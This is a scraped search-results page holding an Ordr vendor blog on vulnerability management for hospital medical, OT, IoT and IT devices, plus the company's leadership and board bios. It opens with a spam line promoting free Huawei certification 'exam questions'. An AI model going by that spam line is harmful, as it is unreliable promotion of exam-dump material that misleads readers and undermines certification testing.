Search Results:
âRole of Huawei H19-431_V1.0 Exam Questions in Getting the Highest-Paid Job đ Search for { H19-431_V1.0 } and download exam materials for free through [ www.pdfvce.com ] đ¸Premium H19-431_V1.0 Filesâ
-
BlogWhy Healthcare Organizations Struggle with Vulnerability Management
…wrong patches, and inaccurate/outdated inventory of software installed on that machine while they are off the grid pose a considerable risk. The nature of hybrid means they may not come…
Risk Management
Why Healthcare Organizations Struggle with Vulnerability Management
13Min ReadBy Pandian Gnanaprakasam
Ordr protects three of the top five healthcare organizations in the U.S., and thousands of hospital sites all over the world with our connected device security platform, powered by our device knowledge base of millions of devices. We are a healthcare-first company and continue to innovate to help our customers address their connected medical device security challenges. Today, weâre excited to launch Ordr Clinical Defender 8.1, with a Full-Lifecycle Vulnerability Management Platform. This release is based on feedback from our healthcare customers, and is specifically optimized to enable HTM teams to see, prioritize and address all connected medical vulnerabilities and clinical risks.
Why is this a priority?
Quite simply, when you secure your devices, you secure patient care. The more efficient HTM teams are at managing and addressing vulnerabilities for healthcare devices, the better the organization is at delivering safe, connected care. But vulnerability management in healthcare is challenging. The exploding growth of connected devices, coupled with increasing vulnerabilities, a rise in cyberattacks and limited resources introduce various complexities.
In this blog, I discuss why this is a monumental challenge for many organizations, how Ordr is solving it, and the best practices you should consider. Here are the key topics, for those who want to skip to the sections important to them.
1. Vulnerability Management in Healthcare Is Complex
At the healthcare organizations Ordr work with, we see medical devices with a wide variety of make, model, and modalities from multiple manufacturers. Hospitals have at least about 2000 unique medical device types with 20 possible operating system variations. Each of the OS embedded has numerous variations with different levels of patching. It is not uncommon to see the total number of vulnerabilities as a multiplication of the number of device types and the associated vulnerabilities for each to amount to tens of thousands. This is a huge challenge unless a robust program (combined with technology) tackles it efficiently with the right prioritization methodology.
Moreover, growing ransomware attacks and the recently introduced cybersecurity bill indicate an urgency for quickly and efficiently tackling device vulnerabilities. However, this can be daunting for Healthcare Technology Management (HTM) professionals tasked with managing and maintaining the vast assortment of hospital tools and devices.
2. Medical Device Full-Lifecycle Vulnerability Management
2.1 Device Classification
It is critical that every device connected to a hospital environment is accurately accounted for and monitored 24×7. Ordrâs passive technology using packet captures and deep packet inspection provides the most comprehensive and granular inventory of devices in a healthcare environment. No other platform can confidently track and monitor 100% of every single connected device in a hospital. Other tools like Vulnerability Scanners only know about the devices they scan, and endpoint agents only know about the devices they are installed on. Ordr moves this process from a one-time activity that happens periodically to continuous monitoring of devices connecting to the network and continuous tracking of new vulnerabilities published daily.
Ordr has comprehensive and accurate classification methods to understand a medical device’s make, model deeply, and modality (how it is configured and deployed in a specific hospital) and then accurately understand the underlying OS down to its patch levels. Once a deviceâs OS and patch level are determined, Ordrâs vulnerability matching engine compares that to publicly available vulnerability databases, FDA notices, manufacturerâs declarations, etc., to get a complete list of all vulnerabilities. This is one of the most challenging aspect of vulnerability management that Ordr simplifies for HTM users.
2.2 Vulnerability Identification for the Whole Hospital
Vulnerability management starts with visibility. It is critical to be able to gain granular visibility and complete asset inventory for every device in the hospital.
- Medical devices – The complexity of vulnerability management with most hospital equipment is trifold.
- Medical equipment very often cannot be scanned like IT endpoints that run standard operating systems. An utterly passive mechanism is needed to understand their vulnerabilities based on how they operate. Since these medical devices provide patient care 24Ă7, any scanning attempt that intensely interrogates the devices with various deep and continuous scans can cause severe disruption in the deviceâs performance and more often brings down the device in the middle of providing patient care.
- Patch Tuesday isnât an option. Hospital IT teams cannot simply download a patch from OS providers like Microsoft. Every change in the underlying OS needs some level of retesting of the medical device for recalibration of the performance and could also trigger an FDA validation for critical compliance. Usually, manufacturers provide patches; in practice, that patch is hard to come by quickly when a vulnerability is detected. Patching is an activity that needs to be done in close cooperation with the manufacturer and is a carefully planned activity so as not to disturb the patient care workflow.
- Medical manufacturers do not always provide a Software Bill of Materials (SBOM), Manufacturer Disclosure Statement for Medical Device Security (MDS2), and other field-deployment-related guidance on risk, which could make the vulnerability management life cycle complex in the long run.
- OT devices – While all enterprises depend on operational systems like building management, elevators, HVAC, UPS, etc., to function smoothly, the criticality is exponential in healthcare. Imagine an operating theater without power or access to elevators and an ER without the ability to admit new patients or access diagnostic systems. A hospital is a single unified inter-dependent entity where all systems need to function at the highest level of resiliency. An attack on one is an attack on all. Identifying vulnerabilities on these devices requires passive methods of understanding the OT systems. For instance. OT systems like building management systems need to be accurately inventoried and classified to understand its make/model/OS/patch levels and its associated vulnerabilities correlated to well-known vulnerability repositories like ICS-CERT.
- IoT devices (including office equipment and security/surveillance devices) – While these include everything from office equipment (printers, phones, video conferencing systems), sound bars to treadmills, vending machines, and gaming devices in rec rooms, hospital IT teams typically do not isolate these systems very well. The criticality of video cameras, badge readers, security alarms, and digital wall clocks is still high in hospitals but has the same issue as standard office equipment. Most scanning solutions do not offer the make and model details. Again, passive techniques to detect their device type make/model/OS/patch level are needed to assess their vulnerabilities accurately.
- Combined and interconnected with other medical equipment, they pose a massive challenge as it is easy for a hacker to compromise them and move laterally. For instance accessing these insecure devices and then, quickly laterally move and take over a Picture Archiving and Communication System (PACS) server that has thousands of patient scan images would be mission impacting
- Understanding the exact device types of IoT like make/model/OS/patches and associated vulnerabilities require various additional techniques like making direct queries to the device using protocols these devices speak to, interrogating and getting their operational characteristics and executing probes to get an accurate picture of the OS/patch level and the software installed on those devices.
- IT devices – Most scanning tools can periodically scan IT devices, understand their vulnerabilities, and generate a report. Ordr has APIs built for well-known vulnerability scanning platforms to kick start a scan, pull information from it, correlate it to devices in Ordrâs device database, and store it for management. However, IT devices need to be monitored continuously, covering the complete software stack installed on them and accurately tracking users logging on to the devices and local accounts created that are not under the control of the AD/Domain controller.
Every device everywhere (including those at remote clinics, and behind VPN/gateways)
More importantly, being unable to manage vulnerabilities for IT devices going off the grid and dialing back in from remote locations leaves enormous blind spots. This also applies to telemedicine and remote clinics. A care providerâs laptop while off grid accessing precious medical records is still a high risk one that needs to be monitored continuously. Vulnerability scanners need the device connected to the corporate network to send scanning packets to extract data based on their response. This is done both with full authentication and sometimes without authentication. But if the device is remote, there is no way to run scans continuously.
With the changing remote-hybrid work landscape, laptops connecting to insecure sites, possibly pulling malicious software, making an update or running wrong patches, and inaccurate/outdated inventory of software installed on that machine while they are off the grid pose a considerable risk. The nature of hybrid means they may not come and connect back to the corporate network any time soon and only click through VPN and other means.
Ordr âwhole hospitalâ approach enables visibility for every device connected to the healthcare network â medical devices, OT devices, IoT devices to traditional IT systems. Clinical Defender 8.1 introduces our Ordr Software Inventory Collector. This feature uses features available in each deviceâs OS to send reports of software inventory of those systems along with the latest OS patch level for continuous monitoring. This enables visibility for Windows, MAC, and Linux devices connected via VPN even if they are offline.
Utilizing Vulnerability Scanners Effectively in a Clinical Environment
Unleashing any scanner in a hospital environment can be a dangerous move. The chance of knocking down a clinical device is exceptionally high. Unfortunately, vulnerability scanners do not have good visibility into the type of device and tend to scan all the devices broadly in a sweep in a specific subnet.
The Ordr platform provides the orchestration layer to send scan jobs to the vulnerability scanners with a list of IPs that excludes critical medical devices for scans and then pull those reports for storage in the Ordr platform.
2.3 Ownership Assignment Using a Centralized Platform
Consolidating vulnerabilities
The need for a central platform to be a repository of all devices and their associated vulnerabilities is paramount now, given the increase in attacks and the complexity associated with vulnerability management in healthcare settings.
Vulnerability scanning platforms typically produce a report each time they scan using a set of IP addresses. When vulnerability scans happen every quarter or six months, during which the IP address of devices changes, there is no way to correlate two consecutive scan reports from a vulnerability scanner to understand the progress made in vulnerability management.
Ordr is the only platform that correlates these IP addresses to MAC addresses, and then the device makes/model/type to help prioritize and understand clinical business risk.
Assigning ownership
Sometimes ownerships cross the device type boundaries and can be complicated. An HTM department may own almost all medical and office-connected devices in a building that even includes phones, printers, nurse call stations and endpoints in clinical diagnostics. It is not a simple case of assigning ownership based on device group or type. A flexible, scalable, and easy transfer of ownership based on region and location is essential. Also, asset/CMDB data like ownership, cost center, and business criticality need to be considered while assigning ownership. Each department within a hospital that takes ownership of the vulnerabilities must assign further these vulnerabilities to each person responsible for those devices to prioritize and focus the work accordingly.
Enhancements to Ordr Data Shaper allow each HTM user to focus on the devices and insights that align precisely with their specific business function group and role. For instance, vulnerabilities are prioritized and assigned to individual HTM personnel based on device type, hospital ID, department, cost center, etc. Ordr Custom Tags help improve workflows, for instance moving the vulnerabilities from one person to another, adjust severity, add comments, and track state change. The product customizes itself to show only those vulnerabilities on the front dashboard to track progress and provides summary management reports at many levels.
2.4 Clinical Prioritization to Improve Patient Care
With hundreds of thousands of devices reporting hundreds of vulnerabilities, organizing and prioritizing becomes daunting. A disciplined approach is needed to prioritize them according to business impact and assign them to the right owners inside the organization.
For risk prioritization, the CVSS is an excellent proxy for understanding the severity of vulnerabilities. Still, it is also essential to look at other frameworks such as ANSI, AAMI, NIST, ISO, FAIR, Risk IT, or JGERR, for supplemental guidance and a more comprehensive understanding to recalibrate them, going back to the foundational principles of Integrity, availability, and confidentiality.
Since healthcare organizations have complex organizational boundaries based on clinical and patient care and not according to the IT needs of a typical enterprise, organizing the data according to ownership is essential.
Ordr’s deep and comprehensive visibility of devices, their operating context, and traffic flows provides a number of key indicators to answer the following considerations for prioritization. Ordr insights can be used as a way to flexibly assess the risk score of a device. Risk score customization helps to prioritize and assign resources to work on the most pressing vulnerabilities.
- How widely does this vulnerability affect the device population of an enterprise?
- What is the level of business criticality concerning cost or other metrics?
- What is the impact to hospital brand and service if impacted â send ambulances to nearby hospitals and postpone elective surgeries?
- How well is the vulnerability exploited in healthcare â like the MAUI ransomware from Korea was targeting healthcare very closely?
- How open these systems are to the external world from a firewall policy perspective?
- How open these devices are to other device in the network with respect to isolation and segmentation perspective?
- How much PHI/PII these devices, that includes medical workstations and servers have? the more they serve as a central server, the more priority they need to get to resolve their vulnerabilities quickly.
- How tightly these devices are configured with respect to open ports?
- How well they are managed with domain controllers; If the device is not part of the domain controller scrutiny should be made more closely on those devices?
- How well they follow data encryption standards and how well they use strong ciphers while transferring data?
Clinical risk assessment
In the hospital, the risk is derived from various device related factors and operating conditions. While understanding the cyber threat is foundational, the clinical context in which the device operates in a patient care setting is a critical consideration. Business impact needs to be quantified on how quickly and broadly these risks affect the operational resilience and how well one can safeguard the devices carrying PHI/PII data. Without this clinical risk-driven prioritization, patient care availability and safety cannot be guaranteed.
Ordr Clinical Risk Scores deliver the following details about devices and clinical risks, and can be customized by every organization:
- Aggregate Cyber Risk (vulnerabilities, external access to phishing/C&C type sites), Internal Communications (access from unprotected non-medical devices, the criticality of the device)
- Environmental Risk (Polluted medical VLAN, isolated or segmented device, access thru wireless, etc.)
- PHI Exposure Risk (sending data without encryption or with weak ciphers, based on manufacturers’ disclosure, device portability, etc.)
- Clinical, Operational Risk (Physical Risk, equipment in ER vs. OR vs. stroke protocol center, is the device mission criticality of the device, what mitigations are applied, and location of the device)
2.5 Compliance and Remediation with Maximum ROI
Once healthcare organizations have a central platform with vulnerability information from different sources independent of how it is collected, workflow organization is critical.
Some of the critical capabilities essential to managing vulnerabilities efficiently can be found using the new âBusiness Function Groupingâ feature in Ordr Clinical Defender 8.1. They include the ability to:
- Assign vulnerable devices based on hospital ID, department (HTM, endpoint, infosec, facility, etc.). Each department needs to focus and work on the devices they are responsible for and assign individuals who would work on those vulnerabilities. It is also possible to completely restrict those individual users to only those devices that they are responsible for. You also need a platform to do this much more dynamically, filtering by any business function grouping of devices.
- Create a focus group. For example, if this month’s goal is to work on all medical servers (like PACS) that house a lot of PHI data, then filter and have only those devices present every time one logs into the tool that month.
- Assign custom tags to draw attention to a co-worker, so the device passes from one person to another.
- Temporarily ignore some vulnerabilities. Often manufacturer-provided patches are unavailable immediately, or these devices are in the research department, not put into routine patient care, and are isolated from the rest of the hospital operation
- Modify risk, although the original risk per the attached CVE could be very high based on the operatorâs judgment. Ability to clear vulnerabilities once patches are applied. Sometimes it is conceivable to increase the risk and priority of vulnerabilities of specific devices like CTs and ultrasounds in stroke protocol trauma centers.
- Track the status of vulnerabilities that fixed, assigned, or ope with the name of the person working on it.
Reporting and Compliance Enterprise-Wide
While manpower and budgets are a key consideration to determine the return on investment, the time it takes to remediate is also a critical as the longer there is an exposure window, the greater the chance of a breach. Resources need to be applied in an intelligent way to remediate critical vulnerabilities and get maximum return on investment.
Ordr offers an ability to keep a close watch on progress using various metrics and reporting as follows:
- Generate reports on-demand. For example, the flexibility to run select region, hospital, department, ownership, OS, and device type allows running reports on the fly.
- Customize reports for senior management visibility.
- Provide APIs that send data to a central corporate-wide tracking database.
Ordr makes reporting and customizations easy with a customizable risk score to adjust the weight ages for vulnerabilities, executive reports to provide summary insights into vulnerable devices, and a dedicated vulnerability report highlighting the impact of new open vulnerabilities on the organization.
Ordr also integrates and exchanges information with leading enterprise vulnerability scanners like Tenable and Rapid7 to provide enterprise wide reporting capability. Ordr also integrates with CMDB solutions like ServiceNow and their vulnerability management systems, allowing healthcare organizations to run corporate-wide reports for governance. Ordr collects medical and other device data and sends all the granular classification details, vulnerabilities, context, security, and operating details to these platforms.
Remediation
Based on various prioritizations, a project plan needs to be maintained, and remediation efforts tracked. Ordr provides an easy way to clear a vulnerability, change the state of the device and a comment field to add notes on the multiple steps towards remediation (called the vendor, the patch is available at this date, etc.
3. Best Practices for Vulnerability Management in Healthcare
Ordr recommends creating focus groups for each owner, with dedicated efforts on addressing critical vulnerabilities within 30 days, and with continued efforts by a few focus groups at a time. Once critical vulnerabilities are addressed, drill into high-risk vulnerabilities with the same focus group and ownership approach and remediate them within 60 days, It is always good to test the patches in a test or lab scenario before incorporating them on devices in clinical setting to reduce risks of downtime.
Ordr also recommends understanding device types and designing a strategy according to the device groups such as:
- IT systems that are not in clinical function â it is highly recommended that those devices are updated with the latest and most secure OS levels and associated patch levels.
- Medical devices that run Windows (a large device group in a hospital) â it may be impossible to upgrade the OS versions as it might trigger calibration and certification; in this case apply all the patches within their OS level.
- Medical devices that are unique versions supplied by the manufacturer — a patch request must be made to the manufacturer; it is important to fix these vulnerabilities ASAP
- IoT and OT – since neither the IT teams nor the supplier may be available to provide patches, the best course would be to segment them into specific network segments or VLANs, and closely control their interactions with the rest of the clinical devices.
Whether patches are available or not, it is best practice to follow the following proactive prevention best practices:
- Restrict external connections and allow only those absolutely critical connections to manufacturerâs sites at the perimeter firewall
- Understand supervisory protocols like RDP that are sometimes opened for manufacturing diagnostics and closely watch and close those just as soon as the maintenance window is over.
- Watch for all supervisory protocols like SSH, Telnet, RCP, etc., and make sure they are all only allowed from admin jump servers handled by authorized admins.
- Apply zero trust policies to only allow the most crucial and relevant communications for every device at the switch level if they are wired, at the AP/wireless-controller level if they are connected thru wireless, or at the firewall level both at the perimeter and the data center.
Ordr Clinical Defender with Vulnerability Management
Ordr is the only comprehensive and integrated platform that simplifies vulnerability lifecycle management for healthcare organizations of all sizes. We introduced Clinical Defender earlier this year, addressing HTM challenges with precision focus, and have now proudly added vulnerability management as we continue to innovate and address our customersâ most critical challenges. Clinical Defender now aggregates vulnerabilities for various device groups across all vulnerability management solutions, organizes them by hospital/department/owner, prioritizes by risk, and tracks the complete lifecycle from the initial assessment of a device to final remediation.
We are grateful to the various healthcare users that worked with our engineering and PM teams on this release.
To learn more about Ordr Clinical Defender 8.1 and how it can help your HTM team stay on top of connected device security, visit the Clinical Defender page.
Side Note: In a typical HTM department, inherent operating system (OS) vulnerabilities due to unpatched systems are the highest priority, much before tackling other security issues that may require implementing zero trust segmentation policies. This article discusses only vulnerabilities related to inherent OS/Patch levels. Check out other behavior and traffic flow related vulnerability discussions:
- Detecting Ryuk Ransomware with Ordr – Security Bulletin
- Solving IoT Security Challenges with Behavioral Analytics – Blog Post
- Ordr Security Brief and Response to Maui Ransomware – Blog Post
- Building a Better Second Line of Defense – Blog Post
Pandian Gnanaprakasam
Pandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur. Before founding Ordr, he was the Chief Development Officer at Aruba, responsible for all of engineering and product management functions. Aruba, an enterprise mobile wireless company, was acquired by HPE for $3 Billion in March 2015. Before Aruba, Pandian served as the head of engineering for Ciscoâs multi-billion-dollar Wi-Fi business unit and before that as VP of engineering for low-end switching product lines. He graduated with a masterâs degree in Electrical Engineering from IIT, Chennai, India and holds several patents to his credit in various networking technologies.
-
PagesAbout
…Networks, an HPE company Read More https://www.linkedin*]}*.com/in/jimhyman/ Dominic Orr Board Member, Ordr Dominic Orr has an impressive track record of leading some of the industry’s most successful and innovative companies,…
About Ordr
We bring âOrdrâ to the chaos and complexity of securing connected assets. By filtering out noise and pinpointing critical risks, Ordr empowers you to safeguard every asset — in the cloud, on-premises, or in SaaS environments– and enable cyber resilience.
Our Mission
To make the connected world a safer place.
Our Vision
To protect every connected asset throughout its entire lifecycle.
Meet Our Leadership Team
Jim Hyman
CEOJim Hyman joins Ordr bringing more than 20 years of experience building and managing world-class teams in enterprise software and Saas businesses with a specific expertise in cybersecurity.
Read MoreJim Hyman
CEOJim Hyman joins Ordr bringing more than 20 years of experience building and managing world-class teams in enterprise software and Saas businesses with a specific expertise in cybersecurity. Prior to taking the helm as Ordrâs CEO, Jim was at Synack, the leader in crowdsourced security testing as their Chief Operating Officer. Jim has successfully driven revenue generation at high growth start-ups and mid-market companies through innovative go-to-market strategies. Previously, Jim was at Trusteer (acquired by IBM in 2013), Z-Scaler (IPO in 2018), and Ironport Systems (acquired by Cisco in 2007). Jimâs experience spans sales, alliances, M&A, finance, venture capital and operations working in the US and internationally. Jim received his B.A. from The University of Pennsylvania and his M.B.A. in finance from The University of Southern California.
Gnanaprakasam Pandian
Chief Product Officer & Co-FounderPandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur.
Read MoreGnanaprakasam Pandian
Chief Product Officer & Co-FounderPandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur. Before founding Ordr, he was the Chief Development Officer at Aruba, responsible for all of engineering and product management functions. Aruba, an enterprise mobile wireless company, was acquired by HPE for $3 Billion in March 2015. Before Aruba, Pandian served as the head of engineering for Ciscoâs multi-billion-dollar Wi-Fi business unit and before that as VP of engineering for low-end switching product lines. He graduated with a masterâs degree in Electrical Engineering from IIT, Chennai, India and holds several patents to his credit in various networking technologies.
Sheausong Yang, PhD
Chief Scientist & Co-FounderBefore starting Ordr in 2015, Sheausong was the Chief Architect and VP of Technology at Aruba Networks, an HP Company and has over 28 years of industry experience.
Read MoreSheausong Yang, PhD
Chief Scientist & Co-FounderBefore starting Ordr in 2015, Sheausong was the Chief Architect and VP of Technology at Aruba Networks, an HP Company. He has over 28 years of industry experiences in wired and wireless networking, cellular communication, system management software, and cloud computing software. Sheausong held both technical and management positions in Cisco System, AT&T Bell Labs, and several startup companies. He received his M.S. and Ph.D. in Computer Science from Northwestern University, and B.S. in Electrical Engineering from National Taiwan University.
Raymond Lim
Chief Financial OfficerAs CFO, Raymond brings more than 20+ years of financial management and operational leadership experience guiding several VC-backed SaaS startup companies through rapid growth and transitional stages.
Read MoreRaymond Lim
Chief Financial OfficerAs CFO, Raymond is a key contributor to the company’s business strategy and overseer of all financial operations. He brings more than 20+ years of financial management and operational leadership experience guiding several VC-backed SaaS startup companies through rapid growth and transitional stages. He also brings expertise managing high-multiple strategic transactions. Prior to Ordr, he was the CFO of PerimeterX, the leading provider of solutions that secure digital businesses against automated fraud and client-side attacks, which was acquired by HUMAN Security in July 2022. Previous to that, he was the CFO for several VC portfolio companies backed by Norwest Venture Partners, Scale Venture Partners and Goldman Sachs. Earlier in his career, he held various financial, engineering and project management positions at ECbridges and Compuware.
Kevin Arsenault
Chief Revenue OfficerKevin Arsenault joins Ordr with over 20 years of leadership experience building and scaling high performance sales teams for successful SaaS based cyber security companies.
Read MoreKevin Arsenault
Chief Revenue OfficerKevin Arsenault joins Ordr with over 20 years of leadership experience building and scaling high performance sales teams for successful SaaS based cyber security companies. Prior to Ordr, Kevin held impactful sales leadership roles over 8.5 years at cyber security leader CrowdStrike, recently as VP of North America. He helped the firm celebrate a successful IPO in June of 2019. Prior to CrowdStrike, Kevin helped build compliance and cyber security firm Proofpoint to its IPO in April of 2012, rising to Worldwide VP of Advanced Security and Information Governance. Kevin also lead successful sales teams at Internet Security Systems (ISS) through its acquisition by IBM in August of 2006. Throughout his career, Kevin has maintained a maniacal focus on customer satisfaction with an emphasis on helping customers solve their IT/cybersecurity problems. Kevin received his Bachelor of Science from Boston College Carroll School of Management.
Wes Wright
Chief Healthcare officerWes is responsible for driving Ordrâs engagement in healthcare. Prior to Sutter, Wes was CTO and then CIO at Seattle Childrensâ, which, to this day, he says was his most gratifying work experience.
Read MoreWes Wright
Chief Healthcare officerWes is responsible for driving Ordrâs engagement in healthcare. Previously he was the CTO for Imprivata, and prior to that VP and CTO at Sutter Health, a 26 hospital network in Northern California. Prior to Sutter, Wes was CTO and then CIO at Seattle Childrensâ, which, to this day, he says was his most gratifying work experience. Prior to his tenure at Childrenâs, Wes was Executive Director, IS at Scripps Health in San Diego, and prior to that, he served in various CIO and CTO capacities with the United States Air Force, retiring as a Major. He has several publications and presentations to his credit, and has been a member of CHIME since 1998. Wes has a Masters in Business Administration from The University of New Mexico. Away from work, he enjoys traveling, jogging, napping and playing with his Boys â heâs a life member of âMarathon Maniacs,â but is not active anymore. Carla WaskoÂ
VP of Human ResourcesAs Ordrâs Vice President of Human Resources, Carla Wasko is a results-driven leader accomplished in building HR strategies, cultures and infrastructures that enable business growth.
Read MoreCarla WaskoÂ
VP of Human ResourcesAs Ordrâs Vice President of Human Resources, Carla Wasko is a results-driven leader accomplished in building HR strategies, cultures and infrastructures that enable business growth. Prior to Ordr, Carlaâs breadth of experience includes over 20 year of HR leadership positions with several network and application security companies including WhiteHat Security, Infoblox, Blue Coat Systems and Packeteer.
Senthil Arunachalam
VP EngineeringSenthil has more than 20 years of experience in wired and wireless technologies.
Read MoreSenthil Arunachalam
VP EngineeringSenthil has more than 20 years of experience in wired and wireless technologies. Before joining Ordr in 2015, Senthil was the Director of Engineering at Aruba Networks, where he was responsible for the software development of Wireless and SDN products. Prior to Aruba, Senthil held engineering leadership positions at Ciscoâs Enterprise and Data Center Switching business units. During his tenure, he led the development of Ciscoâs flagship products, Catalyst 2K , 3K line of switches and was instrumental in building this multi-billion-dollar product line. He holds a B.S in Electrical Engineering from National Institute of Technology, Trichy, India, and M.S in Electrical Engineering from California State University, Northridge.
Dirk Campbell
VP Customer Success and ServicesDirk Campbell has extensive work experience in customer success and services roles, with special emphasis on customer satisfaction and operating cost-effective global technical support and customer success organizations.
Read MoreDirk Campbell
VP Customer Success and ServicesDirk Campbell is Vice President of Customer Success and Services at Ordr. He has extensive work experience in customer success and services roles, with special emphasis on customer satisfaction and operating cost-effective global technical support and customer success organizations. Prior to this, he was the Senior Director of Customer Success at ESS, Inc. and the Global Director of Support Services at Aruba, a Hewlett Packard Enterprise company. Dirk has also held positions as Vice President of Global Customer Advocacy at Pluribus Networks, Senior Director of Global Technical Support at Aruba Networks, Director of Worldwide Technical Support at Juniper Networks, Director of Worldwide Customer Advocacy at Neoteris, Inc, and Director of Customer Care at Blue Coat Systems (acquired by Symantec). His work over his career has helped build several of the best in class and most respected Services and Support organizations in the industry.
Meet Our Board of Directors
Jim Hyman
CEOJim Hyman joins Ordr bringing more than 20 years of experience building and managing world-class teams in enterprise software and Saas businesses with a specific expertise in cybersecurity.
Read MoreJim Hyman
CEOJim Hyman joins Ordr bringing more than 20 years of experience building and managing world-class teams in enterprise software and Saas businesses with a specific expertise in cybersecurity. Prior to taking the helm as Ordrâs CEO, Jim was at Synack, the leader in crowdsourced security testing as their Chief Operating Officer. Jim has successfully driven revenue generation at high growth start-ups and mid-market companies through innovative go-to-market strategies. Previously, Jim was at Trusteer (acquired by IBM in 2013), Z-Scaler (IPO in 2018), and Ironport Systems (acquired by Cisco in 2007). Jimâs experience spans sales, alliances, M&A, finance, venture capital and operations working in the US and internationally. Jim received his B.A. from The University of Pennsylvania and his M.B.A. in finance from The University of Southern California.
RenĂŠ Bonvanie
Executive Chairman, OrdrRenĂŠ is an executive-in-residence based in Batteryâs Menlo Park office. A 35-year technology-industry operating executive, he has had a front-row seat for most of techâs major transition points, working in senior executive roles at Silicon Valley companies including Ingres, Oracle, Business Objects, SAP, Salesforce and Palo Alto Networks.
Read MoreRenĂŠ Bonvanie
Executive Chairman, OrdrRenĂŠ is an executive-in-residence based in Batteryâs Menlo Park office. A 35-year technology-industry operating executive, he has had a front-row seat for most of techâs major transition points, working in senior executive roles at Silicon Valley companies including Ingres, Oracle, Business Objects, SAP, Salesforce and Palo Alto Networks. Most recently, before joining Battery, RenĂŠâwho got his start in technology when he founded a software business in his home country of the Netherlands in 1983âworked in senior executive roles at cybersecurity company Palo Alto Networks. He served as its founding chief marketing officer (CMO) for 10 years, growing the company from a tiny startup to one with nearly $3 billion in annual revenue. RenĂŠ also played a key role in the companyâs initial-public offering in 2012 and served for a year as executive vice-president of strategic accounts. Before Palo Alto Networks, he was a senior vice-president at Serena Software, Salesforce.com and SAP, as well as CMO of Business Objects and a senior vice-president of worldwide marketing at VERITAS Software. Prior to that, RenĂŠâs experience was focused on databases. He joined Oracle Europe in 1992 as the companyâs international marketing lead; then, four years later, former CEO Larry Ellison convinced him to move to Silicon Valley. There, he ran marketing for Oracleâs technology business, including the Oracle database and developer program, and developed Oracleâs internal CRM stack. He joined Oracle from INGRES, where he ran European product marketing for eight years. His first software-development business, started in 1983, used the Ingres database system first developed at the University of California at Berkeley. Over the years, RenĂŠ has also carved out a niche as a go-to advisor for many startups, including Armis, Acronis, Bionic, Bitwarden, Nexthink and others. RenĂŠ holds a degree in economics, with an emphasis on mathematics, from Amsterdamâs Vrije Universiteit and speaks four languages. He is also a devoted Star Trek aficionado.
Dominic Orr
Board Member, OrdrDominic Orr has an impressive track record of leading some of the industryâs most successful and innovative companies, taking them from venture-backed startups to high valuation IPOs and acquisitions. Most recently, Dominic was President of Aruba Networks, an HPE company
Read MoreDominic Orr
Board Member, OrdrDominic Orr has an impressive track record of leading some of the industryâs most successful and innovative companies, taking them from venture-backed startups to high valuation IPOs and acquisitions. Most recently, Dominic was President of Aruba Networks, an HPE company. Prior to Arubaâs acquisition by Hewlett Packard Enterprise, Dominic served as the companyâs Chairman and CEO from an early stage startup in 2006 through a successful public offering on the Nasdaq in 2007, through the HPE deal in 2015. Prior to Aruba, Dominic was president of the Personal Internet Group at Nortel networks following its 2001 acquisition of Alteon WebSystems, an industry leading network infrastructure company that Dominic led as Chairman and CEO from its beginnings in 1996 through the Nortel acquisition, including an historic Nasdaq IPO in 1999. Dominic has also served as a board director for a number of companies, including Chairman of the Board of Ruckus Wireless from 2004 to 2009. Dominic has a BS in Physics from the City College of New York, and a Master of Science and PhD from Caltech. Dominic received the Distinguished Alumni honor from Caltech in 2010.
Alex Doll
Founder & Managing General Partner, TenEleven VenturesAlex is the Founder of Ten Eleven Ventures, the industryâs first venture capital fund that is focused solely on investing in digital security. Alex has been in security, software and finance roles in Silicon Valley for over 20 year
Read MoreAlex Doll
Founder & Managing General Partner, TenEleven VenturesAlex is the Founder of Ten Eleven Ventures, the industryâs first venture capital fund that is focused solely on investing in digital security. Alex has been in security, software and finance roles in Silicon Valley for over 20 years. He was the co-founder of PGP Corporation serving as board member, COO, CFO and VP Business Development from 2002 until its sale to Symantec in 2010. He has continued his involvement with security companies as an angel investor, independent director, entrepreneur-in-residence at Khosla Ventures, and private equity firm consultant with KKR. Alex received his MBA from Stanfordâs Graduate School of Business and graduated cum laude from the University of Pennsylvaniaâs Management & Technology program with a B.S. in Systems Engineering from the Moore School and a B.S. in Finance from the Wharton School.
Dharmesh Thakker
General Partner, Battery VenturesDharmesh joined Battery Ventures in 2015 to focus on early-venture and growth-equity investments in areas including cloud infrastructure, big data, security and next-generation enterprise applications. Prior to Battery, Dharmesh was a managing director at Intel Capital, where he led the firmâs global cloud and big-data practice and made early- and later-stage investments in companies globally.
Read MoreDharmesh Thakker
General Partner, Battery VenturesDharmesh joined Battery Ventures in 2015 to focus on early-venture and growth-equity investments in areas including cloud infrastructure, big data, security and next-generation enterprise applications. Prior to Battery, Dharmesh was a managing director at Intel Capital, where he led the firmâs global cloud and big-data practice and made early- and later-stage investments in companies globally. Before joining Intel Capital, Dharmesh spent almost a decade in product management and go-to-market roles with enterprise-software companies like Keynote Systems, Manhattan Associates and two other startups leading to their acquisition. In 2016, Dharmesh was named to the Forbes Midas Brink list of up-and-coming venture capitalists, and in 2018 he was included on Business Insiderâs 23 Top Venture Capitalists in Enterprise Tech list. A graduate of the University of Texas at Austin, where he received a BS in electrical engineering, Dharmesh also holds an MBA from the Wharton School of Business.
Peter Wagner
Founding Partner, Wing Venture CapitalAs a founding partner at Wing Venture Capital, Peter led investments in dozens of early stage companies, more than 25 of which have gone on to complete IPOâs or successful acquisitions including Nimble Storage, Redback Networks, Riverbed, Arrowpoint Communications, and Infinera
Read MorePeter Wagner
Founding Partner, Wing Venture CapitalAs a founding partner at Wing Venture Capital, Peter led investments in dozens of early stage companies, more than 25 of which have gone on to complete IPOâs or successful acquisitions including Nimble Storage, Redback Networks, Riverbed, Arrowpoint Communications, and Infinera. Before founding Wing, Peter helped lead Accel Partners for 15 years as Managing Partner. Peter holds an A.B. in Physics from Harvard College, summa cum laude, and an M.B.A. from Harvard Business School, where he was a Baker Scholar.
Gnanaprakasam Pandian
Chief Product Officer & Co-FounderPandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur.
Read MoreGnanaprakasam Pandian
